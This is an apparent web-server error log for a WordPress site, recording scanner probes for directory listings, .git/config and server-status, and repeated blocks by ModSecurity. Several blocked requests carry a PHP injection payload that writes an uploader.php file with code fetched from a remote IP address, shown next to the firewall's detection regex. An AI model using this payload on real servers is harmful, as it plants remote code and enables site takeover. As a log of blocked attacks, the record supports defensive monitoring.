(index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Aug 10 17:24:00.345620 2023] [autoindex:error] [pid 6792:tid 139979183302400] [client 104.46.110.117:48932] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://www.investigacionperu.com//wp-includes/js/tinymce/plugins/compat3x/css/index.php [Thu Aug 10 17:24:14.554550 2023] [:error] [pid 7002:tid 139979275622144] [client 104.46.110.117:48980] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/install.php [Thu Aug 10 22:52:26.797201 2023] [autoindex:error] [pid 6792:tid 139979132946176] [client 83.137.145.136:34520] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Aug 10 22:52:27.954822 2023] [autoindex:error] [pid 7002:tid 139979258836736] [client 83.137.145.136:34524] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Cache/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Aug 10 22:52:34.964301 2023] [autoindex:error] [pid 7002:tid 139979107768064] [client 83.137.145.136:34548] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Content/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Aug 10 22:52:39.667047 2023] [autoindex:error] [pid 7002:tid 139979225265920] [client 83.137.145.136:34566] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2021/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Aug 10 22:52:41.763049 2023] [autoindex:error] [pid 6792:tid 139979208480512] [client 83.137.145.136:34572] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/audio/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Aug 10 22:52:42.793064 2023] [autoindex:error] [pid 6792:tid 139979158124288] [client 83.137.145.136:34576] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/comments-pagination-numbers/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Aug 10 22:52:46.633762 2023] [autoindex:error] [pid 7002:tid 139979258836736] [client 83.137.145.136:34590] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Exception/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Aug 10 23:03:29.070433 2023] [:error] [pid 7002:tid 139979124553472] [client 20.163.97.55:35030] [client 20.163.97.55] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZNWzEXZHnKMpdB0vRP_sfAAAANU"], referer: www.google.com [Fri Aug 11 01:16:42.667396 2023] [autoindex:error] [pid 6792:tid 139979166516992] [client 20.198.105.199:41402] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Aug 11 01:33:12.919699 2023] [:error] [pid 6790:tid 139979158124288] [client 20.172.210.84:42122] [client 20.172.210.84] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZNXWKCZl7Zms9FCg0UFV3QAAABE"], referer: www.google.com [Fri Aug 11 02:52:12.594616 2023] [autoindex:error] [pid 7002:tid 139979258836736] [client 143.244.170.66:45462] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://investigacionperu.com/css/index.php [Fri Aug 11 02:52:14.495410 2023] [autoindex:error] [pid 6790:tid 139979191695104] [client 91.204.46.124:45472] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://investigacionperu.com/css/index.php [Fri Aug 11 12:34:14.723444 2023] [autoindex:error] [pid 31953:tid 139959897913088] [client 20.172.237.4:45714] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Aug 11 13:56:02.719879 2023] [autoindex:error] [pid 31953:tid 139959906305792] [client 52.142.52.122:50350] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Aug 11 20:12:10.270957 2023] [autoindex:error] [pid 31747:tid 139960055392000] [client 13.233.220.74:39080] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://investigacionperu.com/css/index.php [Sat Aug 12 06:34:10.849796 2023] [:error] [pid 15533:tid 139948086753024] [client 20.25.148.168:34616] [client 20.25.148.168] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZNduMlqGWPDgv7okq-xl7wAAAM8"], referer: www.google.com [Sat Aug 12 06:40:46.566324 2023] [autoindex:error] [pid 15094:tid 139948044789504] [client 40.117.60.12:34850] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Aug 12 08:15:14.956394 2023] [autoindex:error] [pid 15533:tid 139948053182208] [client 52.149.181.96:38228] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2023/08/12 14:18:49 [error] 15053#15053: *759594 access forbidden by rule, client: 180.252.36.126, server: investigacionperu.com, request: "GET /.git/ HTTP/1.1", host: "www.investigacionperu.com" 2023/08/12 14:18:50 [error] 15053#15053: *759595 access forbidden by rule, client: 180.252.36.126, server: investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "www.investigacionperu.com" [Sat Aug 12 17:20:30.192549 2023] [:error] [pid 15533:tid 139948103538432] [client 104.45.192.150:37210] [client 104.45.192.150] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZNgFrlqGWPDgv7okq-x6ywAAAM0"], referer: www.google.com [Sun Aug 13 09:04:49.286213 2023] [:error] [pid 7450:tid 139736442181376] [client 40.122.51.179:50706] [client 40.122.51.179] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZNjjAah7H134aFCAlTa01gAAAAc"], referer: www.google.com [Sun Aug 13 18:11:40.363618 2023] [:error] [pid 8034:tid 139736458966784] [client 20.57.136.83:46466] [client 20.57.136.83] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZNljLKbQwfRaxGbE71mSAgAAAMU"], referer: www.google.com [Mon Aug 14 06:38:13.998744 2023] [autoindex:error] [pid 15097:tid 139651180320512] [client 4.246.173.159:53526] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2023/08/14 08:38:17 [error] 15022#15022: *847546 access forbidden by rule, client: 146.190.34.35, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2023/08/14 08:38:17 [error] 15022#15022: *847547 access forbidden by rule, client: 146.190.34.35, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Aug 14 10:01:59.259371 2023] [:error] [pid 15097:tid 139651205498624] [client 40.78.129.13:34014] [client 40.78.129.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZNpB5_Nxh0BsgTtZBnp9XAAAAJQ"], referer: www.google.com [Mon Aug 14 12:57:04.289212 2023] [autoindex:error] [pid 15097:tid 139651322996480] [client 168.138.222.91:41210] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Aug 14 14:29:24.052116 2023] [:error] [pid 15097:tid 139651213891328] [client 40.78.129.13:45542] [client 40.78.129.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZNqAlPNxh0BsgTtZBnqBSgAAAJM"], referer: www.google.com [Mon Aug 14 17:19:23.227538 2023] [autoindex:error] [pid 15301:tid 139651423708928] [client 104.45.192.150:54524] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Aug 14 18:50:23.402440 2023] [autoindex:error] [pid 15097:tid 139651289425664] [client 104.46.110.117:58076] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Aug 14 18:50:27.543016 2023] [autoindex:error] [pid 15301:tid 139651314603776] [client 104.46.110.117:58096] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://www.investigacionperu.com//wp-includes/js/tinymce/plugins/compat3x/css/index.php [Mon Aug 14 18:50:41.072485 2023] [:error] [pid 15097:tid 139651322996480] [client 104.46.110.117:58142] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/install.php [Tue Aug 15 01:23:37.549855 2023] [autoindex:error] [pid 15301:tid 139651272640256] [client 15.235.160.194:44310] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Tue Aug 15 03:02:50.628118 2023] [autoindex:error] [pid 15301:tid 139651272640256] [client 20.150.218.44:48084] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Aug 15 06:41:42.689182 2023] [:error] [pid 31658:tid 140202253133568] [client 20.25.148.168:57264] [client 20.25.148.168] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZNtkdr4QuMNA5UEJseWRfAAAANg"], referer: www.google.com [Tue Aug 15 11:48:59.787152 2023] [:error] [pid 31658:tid 140202429380352] [client 40.77.49.41:47760] [client 40.77.49.41] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZNuse74QuMNA5UEJseWbQQAAAMM"], referer: www.google.com [Tue Aug 15 13:49:08.479455 2023] [authz_core:error] [pid 31458:tid 140202510223104] [client 207.154.240.169:57564] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Tue Aug 15 13:49:09.122942 2023] [authz_core:error] [pid 31658:tid 140202303489792] [client 134.122.89.242:57568] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/15 13:49:11 [error] 31389#31389: *902814 access forbidden by rule, client: 207.154.240.169, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/15 13:49:12 [error] 31388#31388: *902817 access forbidden by rule, client: 134.122.89.242, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Aug 15 14:50:13.404050 2023] [authz_core:error] [pid 31457:tid 140202353846016] [client 